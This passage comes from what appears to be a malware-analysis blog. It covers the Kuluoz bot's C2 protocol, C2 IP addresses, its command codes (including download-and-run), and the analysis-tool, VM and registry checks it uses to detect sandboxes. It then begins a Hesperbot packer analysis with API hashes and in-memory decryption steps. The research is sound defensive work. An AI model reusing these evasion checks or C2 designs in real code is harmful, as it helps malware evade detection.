after the string you fag is translated as an in_addr struct.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It
then contacts the C2 server by generating an IP address either thru registry
(as stated above) or by using a hardcoded IP address that is encoded using RC4
encryption with a hardcoded key.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It
will use the following request headers in contacting the C2 server as an
example. <o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Where
“<i>67454D7C3015100394CEF4D903E2D5DDDB1FA83AD0”</i>
is the unique ID generated by hashing user account name, SID and operating
system installation date and “<i>Host:
213.21.158.141:443”</i> is the IP address of the C2 server that was generated
either thru registry or hardcoded in the malware body.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpTa1kwj9pYHj6l1ZYInjb1L6UtqBIz7fgIRDQxdO8S5HzXhdbaqnSY8QCl7yBFh_2j10blCu7HJuGkq8Sd6LGhnt0maPbii3d_CtnJZBXRqAmehoxDhzjt6zr_GUrVIqhrYV0gGtw/s1600/Request+header+of+kuluoz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpTa1kwj9pYHj6l1ZYInjb1L6UtqBIz7fgIRDQxdO8S5HzXhdbaqnSY8QCl7yBFh_2j10blCu7HJuGkq8Sd6LGhnt0maPbii3d_CtnJZBXRqAmehoxDhzjt6zr_GUrVIqhrYV0gGtw/s1600/Request+header+of+kuluoz.png" height="133" width="320" /></span></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i><span lang="EN-US" style="font-weight: normal; line-height: 115%;"><span style="font-family: inherit; font-size: small;">Request header of kuluoz<o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">The content sent by kuluoz to a C2
server follows the following XML encapsulation format.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;"><knock><id>%s</id><group>%s</group><src>%d</src><transport>%d</transport><time>%d</time><version>%d</version><status>%d</status><debug>%s</debug></knock><o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Where:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Knock = xml top element<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Id = Id string<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">group = group id string<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">src = presence of analysis tools or
sandbox strings<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">transport = reports if kuluoz is running
from a removable drive or not<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">time = time stamp<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">version = bot version<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">status = status of last command<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">debug = OS version and type<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It checks for the presence of the
following malware analysis tools window names and registries and places the
result in <src></src> in its knock data.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">FOR
WINDOW NAMES:<o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">wireshark.exe<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Tfrmrpcap<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">iptools.exe<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Iris - Version 5.59<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ProcessLasso_Notification_Class<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">TSystemExplorerTrayForm.UnicodeClass<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">PROCMON_WINDOW_CLASS<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">PROCEXPL<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">WdcWindow<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ProcessHacker<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">99929D61-1338-48B1-9433-D42A1D94F0D2-x64<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">99929D61-1338-48B1-9433-D42A1D94F0D2-x32<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">99929D61-1338-48B1-9433-D42A1D94F0D2<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Dumper<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Dumper64<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">APISpy32Class<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">VMwareDragDetWndClass<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">VMwareSwitchUserControlClass<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">vmtoolsd.exe<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">prl_cc.exe<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">prl_tools.exe<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">SharedIntApp.exe<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">VBoxTray.exe<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">VBoxService.exe<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">vmusrvc.exe<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">vmsrvc.exe<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">FOR
REGISTRY:<o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\SYSTEM\\CurrentControlSet\\services\\Disk\\Enum
0=VMware<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\SYSTEM\\CurrentControlSet\\services\\Disk\\Enum
0=PTLTD<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\SYSTEM\\CurrentControlSet\\services\\Disk\\Enum
0=Virtual<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\\DESCRIPTION\\System\\BIOS
SystemProductName=VMware<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\\DESCRIPTION\\System\\BIOS
SystemProductName=PTLTD<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\\DESCRIPTION\\System\\BIOS
SystemManufacturer=VMware<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\\DESCRIPTION\\System\\BIOS
SystemManufacturer=PTLTD<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINESYSTEM\\CurrentControlSet\\Enum\\PCI\\VEN_15AD&DEV_0774&SUBSYS_040515AD&REV_00
<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINESYSTEM\\CurrentControlSet\\Enum\\PCI\\VEN_15AD&DEV_0774&SUBSYS_074015AD&REV_00<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINESYSTEM\\CurrentControlSet\\Enum\\PCI\\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\\ACPI\\DSDT\\PTLTD__<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\SYSTEM\\CurrentControlSet\\services\\Disk\\Enum
0=Virtual<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\SYSTEM\\CurrentControlSet\\services\\Disk\\Enum
0=PRLS<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\\DESCRIPTION\\System\\BIOS
SystemProductName=Virtual<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\\DESCRIPTION\\System\\BIOS
SystemProductName=PRLS<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\\DESCRIPTION\\System\\BIOS
SystemManufacturer=Virtual<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\\DESCRIPTION\\System\\BIOS
SystemManufacturer=PRLS<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\SYSTEM\\CurrentControlSet\\services\\Disk\\Enum 0= VBox<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\\DESCRIPTION\\System\\BIOS\
SystemProductName = VBox<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\\DESCRIPTION\\System\\BIOS\
SystemManufacturer=VBox<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\\ACPI\\DSDT\\VBOX__<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\\DESCRIPTION\\System\\BIOS\
SystemProductName = AMIBI<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\\DESCRIPTION\\System\\BIOS\
SystemManufacturer = AMIBI<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Enum\\PCI\\VEN_5333&DEV_8811&SUBSYS_00000000&REV_00<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Enum\\PCI\\VEN_80EE&DEV_BEEF&SUBSYS_00000000&REV_00<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Enum\\PCI\\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE,
"HARDWARE\\ACPI\\DSDT\\AMIBI<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It uses the following RSA public key certificate
(which is found embedded in its body) to encrypt data before sending over a
secure shell.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">-----BEGIN PUBLIC KEY-----<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCUAUdLJ1rmxx+bAndp+Cz6+5I<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Kmgap2hn2df/UiVglAvvg2US9qbk65ixqw3dGN/9O9B30q5RD+xtZ6gl4ChBquqw<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">jwxzGTVqJeexn5RHjtFR9lmJMYIwzoc/kMG8e6C/GaS2FCgY8oBpcESVyT2woV7U<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">00SNFZ88nyVv33z9+wIDAQAB<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">-----END PUBLIC KEY----- <o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">After sending encrypted data to a C2
server, it will attempt to acquire a list of current IP addresses and ports of other
possible C2 servers to ensure its continuity in communicating to the REAL C2
server (the mother) accompanied by commands issued by the C2.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQnhYx6tmijc4pVgH_LPwaWh3SjXlkdvKS2PTKJviQ25QFXYbBXi6YQ0JfeBkfT5ys6BERMpwE1IzW6TkwKRO151SpVvxlRSCf5hq5C58qwr8P95w7rKeYoiRKy8kZLFoStDqYgpio/s1600/communicating+with+a+c2+server.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQnhYx6tmijc4pVgH_LPwaWh3SjXlkdvKS2PTKJviQ25QFXYbBXi6YQ0JfeBkfT5ys6BERMpwE1IzW6TkwKRO151SpVvxlRSCf5hq5C58qwr8P95w7rKeYoiRKy8kZLFoStDqYgpio/s1600/communicating+with+a+c2+server.png" height="135" width="320" /></span></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i><span lang="EN-US" style="font-weight: normal; line-height: 115%;"><span style="font-family: inherit; font-size: small;">Communicating with a C2 Server<o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;"><br /></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">A sample of a response header is seen
below.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi6zF05ZKoUHVJop1gdrGzMVxD-mZc7ifM-on6L7xizKP8S0-I5rvfzDxAX8jaiujgNezbRgH86dAjISwfwZ8CzG2xZcDTIXbG6VddipNdwAhBQ-enjXzashAD1BtLdlu7i5OyBFBR/s1600/Response+header+from+c2+server.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi6zF05ZKoUHVJop1gdrGzMVxD-mZc7ifM-on6L7xizKP8S0-I5rvfzDxAX8jaiujgNezbRgH86dAjISwfwZ8CzG2xZcDTIXbG6VddipNdwAhBQ-enjXzashAD1BtLdlu7i5OyBFBR/s1600/Response+header+from+c2+server.png" height="224" width="320" /></span></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i><span lang="EN-US" style="font-weight: normal; line-height: 115%;"><span style="font-family: inherit; font-size: small;">Response Header from C2 Server<o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">As seen from the image, the server it
connects to is of type nginx which is only a proxy server.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">A list of possible proxy servers that I
have acquired is listed below:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">1.234.53.27:443<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">213.21.158.141:443<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">27.54.87.235:443<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">27.54.87.235:443<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">The commands are sent also by using the
following knock data format<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;"><knock><id>67454D7C26333FBA5B5169311188D3A7</id><task
type="idl" /></knock><o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Where:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">task type = the command sent by C2
server<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">A list of possible commands are:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">idl = Long sleep<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">rdl = download and run kuluoz module<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">run = download .exe, install and run<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">rem = remove kuluoz module from the
system<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">red = update registry keys<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-family: inherit;"><span style="font-weight: normal;"><span style="font-size: small;">upd = update kuluoz.exe</span></span><o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
</h2>
<h2>
<div class="MsoNoSpacing">
<br /></div>
</h2>
Anonymoushttp://www.blogger.com/profile/10653752703445056399noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-1292263528437217092013-12-26T21:18:00.000-08:002013-12-26T21:18:02.948-08:00A Hesperbot Core Analysis<br />
<br />
<h2>
<b>A Hesperbot Core Analysis</b></h2>
Like most malware families, Hesperbot may originate in a spam email. Once executed, it will attempt to download its malicious modules through command-and-control (C&C) servers and monitor the activities of the infected computer. These “monitoring activities” may range from logging of keystrokes, recording of the screen, web browser hijacking and many more.<br />
<br />
As I reverse engineer this trojan, I decided to divide it into three layers for easy understanding. These three layers are The Packer, The Injector and The Core.<br />
<br />
<h3>
Three Layers of Hesperbot:</h3>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiYa-S2F9w2z7r_i7wl3_w5jB9m4bFpbTnAEwQB591icDBshtvRU4wwyjdlyX_MsVY7YI4VZ197tlq3NVBhd6hN79ASZWXDLVOuPG2ezSNOKVY7dUww492d6K04WkO-IUO7ivjtmSZ/s1600/overview.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiYa-S2F9w2z7r_i7wl3_w5jB9m4bFpbTnAEwQB591icDBshtvRU4wwyjdlyX_MsVY7YI4VZ197tlq3NVBhd6hN79ASZWXDLVOuPG2ezSNOKVY7dUww492d6K04WkO-IUO7ivjtmSZ/s320/overview.png" /></a><br />
<br />
<h3>
The Packer</h3>
The packer makes use of the Thread Information Block (TIB) to retrieve NTDLL.DLL base address. The base address in turn is used in getting the virtual address of the APIs it needs by feeding it to its own hashing algorithm.<br />
<br />
This Trojan uses the following hashes of APIs to operate:<br />
<br />
For NTDLL.DLL:<br />
<br />
<ul>
<li>0x952A9E4: ZwAllocateVirtualMemory</li>
<li>0xCFF13015: LdrProcessRelocationBlock</li>
</ul>
<br />
It uses ZwAllocateVirtualMemory in order to allot memory space to decrypt 24176hex of data starting from 0x00404438 virtual address where it transfers execution to decrypted data in memory.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijzSxdy4VMit56Xvt20KfoT5R0FTFAnUzaSJd9n2wfACHDtvTUS8Iv4LT-Idzc_Q8niTakY_ozQnu9BKygghVn19rUWW7UBkP-F9dilvgl4GELij792I3gr1BulI-hYrbfDkwrPdKB/s1600/001DecryptToHighMem.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijzSxdy4VMit56Xvt20KfoT5R0FTFAnUzaSJd9n2wfACHDtvTUS8Iv4LT-Idzc_Q8niTakY_ozQnu9BKygghVn19rUWW7UBkP-F9dilvgl4GELij792I3gr1BulI-hYrbfDkwrPdKB/s320/001DecryptToHighMem.png" /></a><br />
<br />
Again it traverses TIB, but this time to get the base address of KERNEL32.DLL.<br />
<br />
It then checks for the following hashes and saves them for later use.<br />
<br />
For KERNEL32.DLL:<br />
<br />
<ul>
<li>0x3A35705F: VirtualFree</li>
<li>0x697A6AFE: VirtualAlloc</li>
<li>0xA9DE6F5A: VirtualProtect</li>
<li>0xC8AC8026: LoadLibraryA</li>
<li>0x1FC0EAEE: GetProcAddress</li>
</ul>
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikldlORPysVdY3_Dhq5sAPgnEa0ao2w0IaZGa9FAGnosWetLJZ0RKoDXWPH3uOlp8_h7RQ7ZNjMqX7LNvL6KHbw3rV71bZPCa3pJ3dn99d1vdjbTD3XE_339OyzOhKxZYVznH6r4n-/s1600/002GettingKernelThruTIB.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikldlORPysVdY3_Dhq5sAPgnEa0ao2w0IaZGa9FAGnosWetLJZ0RKoDXWPH3uOlp8_h7RQ7ZNjMqX7LNvL6KHbw3rV71bZPCa3pJ3dn99d1vdjbTD3XE_339OyzOhKxZYVznH6r4n-/s320/002GettingKernelThruTIB.png" /></a><br />
<br />
It allocates another memory space using kernel32.VirtualAlloc and decrypts part of its data (the dropper module). As you can see in the figure below, the encrypted data is on the left and the decrypted data consists of MZ-PE header on the right.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG-eyGiSV3ftYouym1ECc6wwUvTzEE-c_CC6xj5eHxaXafwq4e_hlHPTCnt_uQ_K4hxMMlb_m2Wps34AxMn7ZQRFWToYdR1NViBViKa0Y-6lAQ-V6uIQnIAg6_D-72pj4bJYC0fUOn/s1600/003DecryptedMZPE.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG-eyGiSV3ftYouym1ECc6wwUvTzEE-c_CC6xj5eHxaXafwq4e_hlHPTCnt_uQ_K4hxMMlb_m2Wps34AxMn7ZQRFWToYdR1NViBViKa0Y-6lAQ-V6uIQnIAg6_D-72pj4bJYC0fUOn/s320/003DecryptedMZPE.png" /></a><br />
<br />
This data is then overwritten to the memory space of the original process in conjunction with the usage of kernel32.VirtualProtect to avoid access violation errors in the committed pages of the original process.<br />
<br />
